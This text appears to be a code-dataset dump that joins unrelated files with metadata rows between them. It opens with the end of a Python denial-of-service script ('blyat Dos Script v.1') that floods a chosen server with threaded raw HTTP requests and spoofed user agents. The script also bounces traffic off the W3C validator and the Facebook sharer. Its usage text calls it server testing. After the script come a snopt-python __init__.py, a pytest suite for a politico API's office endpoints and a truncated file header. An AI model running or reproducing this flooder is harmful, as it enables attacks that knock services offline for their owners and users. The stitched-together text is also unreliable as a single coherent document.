uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0')
uagent.append('Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10')
uagent.append('Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)')
uagent.append('Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)')
uagent.append('Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)')
uagent.append('Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/uagent)')
uagent.append('Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16')
uagent.append('Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
uagent.append('Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)')
uagent.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
uagent.append('Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)')
uagent.append('Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7')
uagent.append('BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0')
uagent.append('Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)')
uagent.append('Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)')
uagent.append('Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)')
uagent.append('Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)')
uagent.append('Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007')
uagent.append('BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179')
uagent.append('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)')
uagent.append('Googlebot/2.1 (http://www.googlebot.com/bot.html)')
uagent.append('Opera/9.20 (Windows NT 6.0; U; en)')
uagent.append('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)')
uagent.append('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)')
uagent.append('Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16')
uagent.append('Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13')
uagent.append('Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)')
uagent.append('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)')
uagent.append('Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7')
uagent.append('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)')
uagent.append('Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)')
uagent.append('YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
uagent.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
uagent.append('AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)')
uagent.append('Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)')
uagent.append('Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57')
uagent.append('Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
uagent.append('Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0')
uagent.append('Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g')
uagent.append('Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125')
uagent.append('Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)')
uagent.append('Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)')
uagent.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
uagent.append('Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)')
uagent.append('Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)')
return(uagent)
def my_uagent():
global uagent
uagent=[]
uagent.append("http://validator.w3.org/check?uri=")
uagent.append("http://www.facebook.com/sharer/sharer.php?u=")
return(uagent)
def bot_hammering(url):
try:
while True:
req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))
print("\033[94mbot is hammering...\033[0m")
time.sleep(.1)
except:
time.sleep(.1)
def down_it(item):
try:
while True:
packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
if s.sendto( packet, (host, int(port)) ):
s.shutdown(1)
print ("\033[92m",time.ctime(time.time()),"\033[0m \033[94m <--packet sent! hammering--> \033[0m")
else:
s.shutdown(1)
print("\033[91mshut<->down\033[0m")
time.sleep(.1)
except socket.error as e:
print("\033[91mno connection! server maybe down\033[0m")
#print("\033[91m",e,"\033[0m")
time.sleep(.1)
def dos():
while True:
item = q.get()
down_it(item)
q.task_done()
def dos2():
while True:
item=w.get()
bot_hammering(random.choice(uagent)+"http://"+host)
w.task_done()
def usage():
print (''' \033[92m blyat Dos Script v.1 http://www.canyalcin.com/
It is the end user's responsibility to obey all applicable laws.
It is just for server testing script. Your ip is visible. \n
usage : python3 dos.py [-s] [-p] [-t]
-h : help
-s : server ip
-p : port default 80
-t : turbo default 135 \033[0m''')
sys.exit()
def get_parameters():
global host
global port
global thr
global item
optp = OptionParser(add_help_option=False,epilog="Hammers")
optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO)
optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")
optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")
optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135")
optp.add_option("-h","--help",dest="help",action='store_true',help="help you")
opts, args = optp.parse_args()
logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
if opts.help:
usage()
if opts.host is not None:
host = opts.host
else:
usage()
if opts.port is None:
port = 80
else:
port = opts.port
if opts.turbo is None:
thr = 135
else:
thr = opts.turbo
# reading headers
global data
headers = open("headers.txt", "r")
data = headers.read()
headers.close()
#task queue are q,w
q = Queue()
w = Queue()
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
get_parameters()
print("\033[92m",host," port: ",str(port)," turbo: ",str(thr),"\033[0m")
print("\033[94mPlease wait...\033[0m")
user_agent()
my_uagent()
time.sleep(5)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
s.settimeout(1)
except socket.error as e:
print("\033[91mcheck server ip and port\033[0m")
usage()
while True:
for i in range(int(thr)):
t = threading.Thread(target=dos)
t.daemon = True # if thread is exist, it dies
t.start()
t2 = threading.Thread(target=dos2)
t2.daemon = True # if thread is exist, it dies
t2.start()
start = time.time()
#tasking
item = 0
while True:
if (item>1800): # for no memory crash
item=0
time.sleep(.1)
item = item + 1
q.put(item)
w.put(item)
q.join()
w.join()
| 92.153846 | 258 | 0.696365 | 12,637 | 63,494 | 3.489119 | 0.040516 | 0.14751 | 0.196067 | 0.113399 | 0.951828 | 0.948471 | 0.947088 | 0.946952 | 0.944162 | 0.944162 | 0 | 0.164475 | 0.107553 | 63,494 | 688 | 259 | 92.287791 | 0.613642 | 0.002299 | 0 | 0.858647 | 0 | 0.717293 | 0.796735 | 0.029933 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01203 | false | 0 | 0.004511 | 0 | 0.016541 | 0.01203 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
0339e58ca59329200d57e1e3c5205f42b1463840 | 346 | py | Python | __init__.py | jainajinkya/snopt-python | 832a12c2422d23bbd7d3a476a3a3ae50ac7fc84f | [
"MIT"
] | 34 | 2015-02-10T17:37:49.000Z | 2022-03-07T23:07:07.000Z | __init__.py | jainajinkya/snopt-python | 832a12c2422d23bbd7d3a476a3a3ae50ac7fc84f | [
"MIT"
] | 11 | 2016-01-21T16:20:57.000Z | 2019-09-25T22:57:00.000Z | __init__.py | jainajinkya/snopt-python | 832a12c2422d23bbd7d3a476a3a3ae50ac7fc84f | [
"MIT"
] | 15 | 2016-07-19T10:22:20.000Z | 2022-01-13T06:53:40.000Z | #!/usr/bin/env python
__all__ = [ 'snopta', 'snoptb', 'snoptc', 'sqopt',
'dnopt', 'dqopt',
'SNOPT_options', 'DNOPT_options',
'SNOPT_solution', 'DNOPT_solution' ]
from .solvers import(
snopta, snoptb, snoptc, sqopt,
dnopt, dqopt,
SNOPT_options, DNOPT_options,
SNOPT_solution, DNOPT_solution)
| 26.615385 | 50 | 0.615607 | 36 | 346 | 5.583333 | 0.472222 | 0.119403 | 0.179104 | 0.228856 | 0.825871 | 0.825871 | 0.825871 | 0.825871 | 0.825871 | 0.825871 | 0 | 0 | 0.242775 | 346 | 12 | 51 | 28.833333 | 0.767176 | 0.057803 | 0 | 0 | 0 | 0 | 0.267692 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cef29df4fd6189e3189a1a056ffe885363fd8a63 | 13,140 | py | Python | app/tests/v1/test_offices.py | luqee/politico-api | f388f830efc3ecae7aeb9b3bd794135dd69731f7 | [
"MIT"
] | null | null | null | app/tests/v1/test_offices.py | luqee/politico-api | f388f830efc3ecae7aeb9b3bd794135dd69731f7 | [
"MIT"
] | null | null | null | app/tests/v1/test_offices.py | luqee/politico-api | f388f830efc3ecae7aeb9b3bd794135dd69731f7 | [
"MIT"
] | null | null | null | from app.tests.v1 import utils
TEST_UTILS = utils.Utils()
def test_create_office(client):
''' Test create office '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
response = client.post('api/v1/offices', json=TEST_UTILS.OFFICES[0], headers=headers)
json_data = response.get_json()
assert response.status_code == 201
assert isinstance(json_data['data'], list)
def test_non_admin_create_office(client):
''' Test create office by non admin '''
TEST_UTILS.register_user(client, 'user')
login_res = TEST_UTILS.login_user(client, 'user')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
response = client.post('api/v1/offices', json=TEST_UTILS.OFFICES[0], headers=headers)
json_data = response.get_json()
assert response.status_code == 403
assert json_data['status'] == 403
assert isinstance(json_data['error'], str)
assert json_data['error'] == 'You need to be an admin to create an office'
def test_create_duplicate_office(client):
''' Test cannot create duplicate office '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
client.post('api/v1/offices', json=TEST_UTILS.OFFICES[0], headers=headers)
response = client.post('api/v1/offices', json=TEST_UTILS.OFFICES[0], headers=headers)
json_data = response.get_json()
assert response.status_code == 409
assert json_data['status'] == 409
assert isinstance(json_data['error'], str)
assert json_data['error'] == 'Office exists'
def test_create_office_no_payload(client):
''' Test office cannot be created with no payload '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
response = client.post('api/v1/offices', headers=headers)
json_data = response.get_json()
assert response.status_code == 400
assert json_data['status'] == 400
assert isinstance(json_data['error'], str)
assert json_data['error'] == 'Provide name, office_type, and description as json'
def test_create_office_empty_payload(client):
''' Test office cannot be created with empty payload '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
data = {
}
response = client.post('api/v1/offices', json=data, headers=headers)
json_data = response.get_json()
assert response.status_code == 400
assert json_data['status'] == 400
assert isinstance(json_data['error'], str)
assert json_data['error'] == 'Provide name, office_type, and description as json'
def test_create_office_no_name(client):
''' Test office cannot be created with no name '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
data = {
'name': '',
'office_type': TEST_UTILS.OFFICES[0]['office_type'],
'description': TEST_UTILS.OFFICES[0]['description']
}
response = client.post('api/v1/offices', json=data, headers=headers)
json_data = response.get_json()
assert response.status_code == 400
assert json_data['status'] == 400
assert isinstance(json_data['error'], str)
assert json_data['error'] == 'Please provide the name'
def test_create_office_name_spaces(client):
''' Test office cannot be created with space name '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
data = {
'name': ' ',
'office_type': TEST_UTILS.OFFICES[0]['office_type'],
'description': TEST_UTILS.OFFICES[0]['description']
}
response = client.post('api/v1/offices', json=data, headers=headers)
json_data = response.get_json()
assert response.status_code == 400
assert json_data['status'] == 400
assert isinstance(json_data['error'], str)
assert json_data['error'] == 'Please provide a valid name'
def test_create_office_short_name(client):
''' Test office cannot be created with short name '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
data = {
'name': 'we',
'office_type': TEST_UTILS.OFFICES[0]['office_type'],
'description': TEST_UTILS.OFFICES[0]['description']
}
response = client.post('api/v1/offices', json=data, headers=headers)
json_data = response.get_json()
assert response.status_code == 400
assert json_data['status'] == 400
assert isinstance(json_data['error'], str)
assert json_data['error'] == 'The name provided is too short'
def test_create_office_long_name(client):
''' Test office cannot be created with long name '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
data = {
'name': 'dilgjdigiceergeruguduergruega',
'office_type': TEST_UTILS.OFFICES[0]['office_type'],
'description': TEST_UTILS.OFFICES[0]['description']
}
response = client.post('api/v1/offices', json=data, headers=headers)
json_data = response.get_json()
assert response.status_code == 400
assert json_data['status'] == 400
assert isinstance(json_data['error'], str)
assert json_data['error'] == 'The name provided is too long'
def test_create_office_invalid_type(client):
''' Test office cannot be created with invalid office_type '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
data = {
'name': TEST_UTILS.OFFICES[0]['name'],
'office_type': 'notype',
'description': TEST_UTILS.OFFICES[0]['description']
}
response = client.post('api/v1/offices', json=data, headers=headers)
json_data = response.get_json()
assert response.status_code == 400
assert json_data['status'] == 400
assert isinstance(json_data['error'], str)
assert json_data['error'] == 'The office_type provided is invalid'
def test_get_office(client):
''' Test get single office '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
TEST_UTILS.create_office(client, TEST_UTILS.OFFICES[1], headers)
response = client.get('api/v1/offices/1')
json_data = response.get_json()
assert response.status_code == 200
assert isinstance(json_data['data'], list)
def test_get_non_existing_office(client):
''' Test get non existing office '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
TEST_UTILS.create_office(client, TEST_UTILS.OFFICES[1], headers)
response = client.get('api/v1/offices/13')
json_data = response.get_json()
assert response.status_code == 404
assert json_data['status'] == 404
assert isinstance(json_data['error'], str)
assert json_data['error'] == 'Office not found'
def test_get_offices(client):
''' Test get all offices '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
TEST_UTILS.create_offices(client, headers)
response = client.get('api/v1/offices')
json_data = response.get_json()
assert response.status_code == 200
assert isinstance(json_data['data'], list)
def test_update_office(client):
''' Test update single office '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
TEST_UTILS.create_office(client, TEST_UTILS.OFFICES[1], headers)
data = {
'name': 'Prime',
'office_type': 'State',
'description': 'Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitatio'
}
response = client.patch('api/v1/offices/1', json=data, headers=headers)
json_data = response.get_json()
assert response.status_code == 200
assert isinstance(json_data['data'], list)
def test_update_office_empty_payload(client):
''' Test update office with empty payload '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
TEST_UTILS.create_office(client, TEST_UTILS.OFFICES[1], headers)
data = {
}
response = client.patch('api/v1/offices/1', json=data, headers=headers)
json_data = response.get_json()
assert response.status_code == 400
assert json_data['status'] == 400
assert isinstance(json_data['error'], str)
assert json_data['error'] == 'Provide name, office_type, and description as json'
def test_update_office_no_payload(client):
''' Test update office with no payload '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
TEST_UTILS.create_office(client, TEST_UTILS.OFFICES[1], headers)
response = client.patch('api/v1/offices/1', headers=headers)
json_data = response.get_json()
assert response.status_code == 400
assert json_data['status'] == 400
assert isinstance(json_data['error'], str)
assert json_data['error'] == 'Provide name, office_type, and description as json'
def test_update_non_existing_office(client):
''' Test update non existing office '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
data = {
'name': 'Prime',
'office_type': 'State',
'description': 'Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitatio'
}
TEST_UTILS.create_office(client, TEST_UTILS.OFFICES[1], headers)
response = client.patch('api/v1/offices/12', json=data, headers=headers)
json_data = response.get_json()
assert response.status_code == 404
assert json_data['status'] == 404
assert isinstance(json_data['error'], str)
assert json_data['error'] == 'Office not found'
def test_delete_office(client):
''' Test delete office '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
TEST_UTILS.create_office(client, TEST_UTILS.OFFICES[1], headers)
response = client.delete('api/v1/offices/1', headers=headers)
json_data = response.get_json()
assert response.status_code == 202
assert isinstance(json_data['data'], list)
assert json_data['data'][0]['message'] == 'Office deleted successfully'
def test_delete_non_existing_office(client):
''' Test delete non existing office '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
TEST_UTILS.create_office(client, TEST_UTILS.OFFICES[1], headers)
response = client.delete('api/v1/offices/9', headers=headers)
json_data = response.get_json()
assert response.status_code == 404
assert json_data['status'] == 404
assert isinstance(json_data['error'], str)
assert json_data['error'] == 'Office not found'
| 42.250804 | 198 | 0.678158 | 1,714 | 13,140 | 4.977246 | 0.071762 | 0.089087 | 0.063299 | 0.046771 | 0.926855 | 0.900715 | 0.88278 | 0.866604 | 0.839175 | 0.839175 | 0 | 0.017646 | 0.176256 | 13,140 | 310 | 199 | 42.387097 | 0.77051 | 0.052435 | 0 | 0.707407 | 0 | 0.007407 | 0.211674 | 0.002351 | 0 | 0 | 0 | 0 | 0.248148 | 1 | 0.07037 | false | 0 | 0.003704 | 0 | 0.074074 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cef6f6eb95ee2ae67ead070b56f7bbb7db8526e9 | 4,451 | py | Python | pipeline/schemas/user.py | mystic-ai/pipeline | 487c5e755a862a12c90572b0eff170853ecb3790 | [
"Apache-2.0"
] | 7 | 2022-01-28T20:27:50.000Z | 2022-02-22T15:30:00.000Z | pipeline/schemas/user.py | mystic-ai/pipeline | 487c5e755a862a12c90572b0eff170853ecb3790 | [
